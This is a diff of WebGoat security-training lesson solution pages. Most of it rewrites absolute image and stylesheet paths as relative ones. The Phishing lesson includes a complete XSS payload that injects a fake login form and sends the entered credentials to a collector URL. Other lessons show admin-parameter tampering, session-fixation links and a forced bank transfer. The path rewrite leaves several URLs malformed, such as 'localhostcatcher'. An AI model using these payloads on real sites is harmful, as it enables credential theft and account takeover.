<v:imagedata src="/WebGoat/lesson_solutions/LogSpoofing_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/LogSpoofing_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/LogSpoofing_files/image009.jpg" v:shapes="Picture_x0020_137"><![endif]></span></p>
src="lesson_solutions/LogSpoofing_files/image009.jpg" v:shapes="Picture_x0020_137"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

2
webgoat/main/project/WebContent/lesson_solutions/MultiLevelLogin1.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Multi Level Login 1</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Multi Level Login 1</p>

2
webgoat/main/project/WebContent/lesson_solutions/MultiLevelLogin2.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Multi Level Login 2</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Multi Level Login 2</p>

8
webgoat/main/project/WebContent/lesson_solutions/PasswordStrength.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>password Strength</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Password Strength</p>
@ -18,13 +18,13 @@ Accounts are only as secure as there passwords. Most users have the same weak pa
<br><br>
<b>Solution:</b><br/>
Open your browser on <a href="https://www.cnlab.ch/codecheck" target="_blank">https://www.cnlab.ch/codecheck</a>. Copy the first password in the field and click "Run the check".<br><br>
<img src="/WebGoat/lesson_solutions/PasswordStrength_files/image001.jpg"><br/>
<img src="lesson_solutions/PasswordStrength_files/image001.jpg"><br/>
<font size="2"><b>Code checker</b></font><br/><br/><br/>
You will get a little pop-up. Choose "Yes, I want this word to be tested".<br><br>
<img src="/WebGoat/lesson_solutions/PasswordStrength_files/image002.jpg"><br/>
<img src="lesson_solutions/PasswordStrength_files/image002.jpg"><br/>
<font size="2"><b>Pop-up</b></font><br/><br/><br/>
You will get get the result of the check.<br><br>
<img src="/WebGoat/lesson_solutions/PasswordStrength_files/image003.jpg"><br/>
<img src="lesson_solutions/PasswordStrength_files/image003.jpg"><br/>
<font size="2"><b>The result</b></font><br/><br/><br/>
Do this with all of the five given passwords.<br><br>
Here are the results you get:<br><br>

20
webgoat/main/project/WebContent/lesson_solutions/PathBasedAccessControl.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/editdata.mso">
<link rel=File-List href="lesson_solutions/PathBasedAccessControl_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/PathBasedAccessControl_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/PathBasedAccessControl_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml">
href="lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -575,9 +575,9 @@ access a file that is not in the listed directory.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_457" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/PathBasedAccessControl_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image002.jpg" v:shapes="Picture_x0020_457"><![endif]></span></p>
src="lesson_solutions/PathBasedAccessControl_files/image002.jpg" v:shapes="Picture_x0020_457"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -601,9 +601,9 @@ can be solved by intercepting the filename in WebScarab and replacing it with
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_458"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/PathBasedAccessControl_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image004.jpg" v:shapes="Picture_x0020_458"><![endif]></span></p>
src="lesson_solutions/PathBasedAccessControl_files/image004.jpg" v:shapes="Picture_x0020_458"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -618,9 +618,9 @@ field-end'></span><![endif]--> Change the variable File<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_459"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/PathBasedAccessControl_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image006.jpg" v:shapes="Picture_x0020_459"><![endif]></span><span
src="lesson_solutions/PathBasedAccessControl_files/image006.jpg" v:shapes="Picture_x0020_459"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span

8
webgoat/main/project/WebContent/lesson_solutions/Phishing.html
View File

@ -2,7 +2,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Phishing with XSS</p>
@ -18,7 +18,7 @@ hard for a victim to determinate that the content is malicious.
<p><b>General Goal(s):</b><br/>
The user should be able to add a form asking for username
and password. On submit the input should be sent to
http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
http://localhostcatcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
</p>
<b>Solution:</b><br/>
@ -40,7 +40,7 @@ Now you need a script:
<p>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+
XSSImage=new Image; XSSImage.src=&quot;http://localhostcatcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;/script&gt;
</p>
@ -52,7 +52,7 @@ calls the script. You can reach this wicht the onclick="myFunction" handler.
The final String looks like this:<br/>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+
XSSImage=new Image; XSSImage.src=&quot;http://localhostcatcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;

16
webgoat/main/project/WebContent/lesson_solutions/ReflectedXSS.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/ReflectedXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ReflectedXSS_files/editdata.mso">
<link rel=File-List href="lesson_solutions/ReflectedXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/ReflectedXSS_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/ReflectedXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/ReflectedXSS_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/ReflectedXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/ReflectedXSS_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -623,9 +623,9 @@ the script and do something bad.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1366" o:spid="_x0000_i1026" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ReflectedXSS_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/ReflectedXSS_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/ReflectedXSS_files/image005.jpg" v:shapes="Picture_x0020_1366"><![endif]></span></p>
src="lesson_solutions/ReflectedXSS_files/image005.jpg" v:shapes="Picture_x0020_1366"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -649,9 +649,9 @@ style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1367"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:270pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ReflectedXSS_files/image003.png" o:title="" cropbottom="4085f"/>
<v:imagedata src="lesson_solutions/ReflectedXSS_files/image003.png" o:title="" cropbottom="4085f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=360
src="/WebGoat/lesson_solutions/ReflectedXSS_files/image006.jpg" v:shapes="Picture_x0020_1367"><![endif]></span></p>
src="lesson_solutions/ReflectedXSS_files/image006.jpg" v:shapes="Picture_x0020_1367"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

24
webgoat/main/project/WebContent/lesson_solutions/RemoteAdminFlaw.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/editdata.mso">
<link rel=File-List href="lesson_solutions/RemoteAdminFlaw_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/RemoteAdminFlaw_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/RemoteAdminFlaw_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -571,9 +571,9 @@ via a URL (/admin) and will not count towards the completion of this lesson. <o:
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_451" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/RemoteAdminFlaw_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image002.jpg" v:shapes="Picture_x0020_451"><![endif]></span></p>
src="lesson_solutions/RemoteAdminFlaw_files/image002.jpg" v:shapes="Picture_x0020_451"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -604,9 +604,9 @@ browser and hit "Enter"<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_452"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/RemoteAdminFlaw_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image004.jpg" v:shapes="Picture_x0020_452"><![endif]></span></p>
src="lesson_solutions/RemoteAdminFlaw_files/image004.jpg" v:shapes="Picture_x0020_452"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -619,9 +619,9 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Clicking on
"User Information" will not work. This is because the URL behind "User
Information" is <a href="http://localhost/WebGoat/attack?Screen=71&amp;menu=10">http://localhost/WebGoat/attack?Screen=71&amp;menu=10</a>
Information" is <a href="http://localhostattack?Screen=71&amp;menu=10">http://localhostattack?Screen=71&amp;menu=10</a>
does not contain the parameter admin=true. Rewrite the URL to become <a
href="http://localhost/WebGoat/attack?Screen=71&amp;menu=10&amp;admin=true">http://localhost/WebGoat/attack?Screen=71&amp;menu=10&amp;admin=true</a><o:p></o:p></span></p>
href="http://localhostattack?Screen=71&amp;menu=10&amp;admin=true">http://localhostattack?Screen=71&amp;menu=10&amp;admin=true</a><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -636,9 +636,9 @@ randomly and can be different in your environment!<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_453"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/RemoteAdminFlaw_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=369
src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image006.jpg" v:shapes="Picture_x0020_453"><![endif]></span><span
src="lesson_solutions/RemoteAdminFlaw_files/image006.jpg" v:shapes="Picture_x0020_453"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span

4
webgoat/main/project/WebContent/lesson_solutions/SessionFixation.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Session Fixation</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Session Fixation</p>
@ -50,7 +50,7 @@ The mail is already prepared. You only have to alter the link so it includes
a Session ID (SID). You can archive this by adding &SID=WHATEVER to
the link. Of course can WHATEVER be replaced by any other string.
The link should look similar to following:<br>
&lt;a href=http://localhost/WebGoat/attack?Screen=46&menu=320&SID=WHATEVER&gt;
&lt;a href=http://localhostattack?Screen=46&menu=320&SID=WHATEVER&gt;
</p>
<div align="left"><font size="2">
<img src='lesson_solutions/SessionFixation_files/sf_stage1.png'><br>

26
webgoat/main/project/WebContent/lesson_solutions/SilentTransactions.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/SilentTransactions_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SilentTransactions_files/editdata.mso">
<link rel=File-List href="lesson_solutions/SilentTransactions_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SilentTransactions_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/SilentTransactions_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/SilentTransactions_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/SilentTransactions_files/colorschememapping.xml">
href="lesson_solutions/SilentTransactions_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -673,9 +673,9 @@ transaction.<br style='mso-special-character:line-break'>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_89" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/SilentTransactions_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SilentTransactions_files/image009.jpg" v:shapes="Picture_x0020_89"><![endif]></span></p>
src="lesson_solutions/SilentTransactions_files/image009.jpg" v:shapes="Picture_x0020_89"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -778,7 +778,7 @@ style='mso-spacerun:yes'>
submitData(accountNo, balance) {<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>var url =
'/WebGoat/attack?Screen=74&amp;menu=1150&amp;from=ajax&amp;newAccount='+
'attack?Screen=74&amp;menu=1150&amp;from=ajax&amp;newAccount='+
accountNo+ '&amp;amount=' + balance +'&amp;confirm=' +
document.getElementById('confirm').value; <o:p></o:p></span></p>
@ -870,9 +870,9 @@ javascript:function();. Try to execute: javascript:submitData(1234556,11000);<o:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_90"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/SilentTransactions_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SilentTransactions_files/image010.jpg" v:shapes="Picture_x0020_90"><![endif]></span></p>
src="lesson_solutions/SilentTransactions_files/image010.jpg" v:shapes="Picture_x0020_90"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -886,9 +886,9 @@ field-end'></span><![endif]--> Follow the hints....</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_91" o:spid="_x0000_i1026"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/SilentTransactions_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/SilentTransactions_files/image011.jpg" v:shapes="Picture_x0020_91"><![endif]></span></p>
src="lesson_solutions/SilentTransactions_files/image011.jpg" v:shapes="Picture_x0020_91"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -905,9 +905,9 @@ submitData(123456,110000);</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_92" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/SilentTransactions_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SilentTransactions_files/image012.jpg" v:shapes="Picture_x0020_92"><![endif]></span></p>
src="lesson_solutions/SilentTransactions_files/image012.jpg" v:shapes="Picture_x0020_92"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

32
webgoat/main/project/WebContent/lesson_solutions/SoapRequest.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/SoapRequest_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SoapRequest_files/editdata.mso">
<link rel=File-List href="lesson_solutions/SoapRequest_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SoapRequest_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/SoapRequest_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/SoapRequest_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/SoapRequest_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/SoapRequest_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -658,7 +658,7 @@ Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try
connecting to the WSDL with a browser or Web Service tool. The URL for the web
service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually
service is: http://localhostservices/SoapRequest The WSDL can usually
be viewed by adding a ?WSDL on the end of the web service request.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -686,9 +686,9 @@ be viewed by adding a ?WSDL on the end of the web service request.<o:p></o:p></s
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_13" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image002.jpg" v:shapes="Picture_x0020_13"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image002.jpg" v:shapes="Picture_x0020_13"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -711,9 +711,9 @@ URL "WebGoat WSDL" to examine the Webservices Description Language file.<o:p></o
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_14"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image004.jpg" v:shapes="Picture_x0020_14"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image004.jpg" v:shapes="Picture_x0020_14"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -732,9 +732,9 @@ number of operations like getFirstName. There are 4 operations defined.<o:p></o:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_15"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image006.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image006.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -754,9 +754,9 @@ int and click "Submit".<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_16"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image008.jpg" v:shapes="Picture_x0020_16"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image008.jpg" v:shapes="Picture_x0020_16"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -789,7 +789,7 @@ HTTP Request with WebScarab and click on the
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>POST
http://neo:80/WebGoat/services/SoapRequest HTTP/1.1<o:p></o:p></span></p>
http://neo:80services/SoapRequest HTTP/1.1<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>Content-Type:
text/xml<o:p></o:p></span></p>
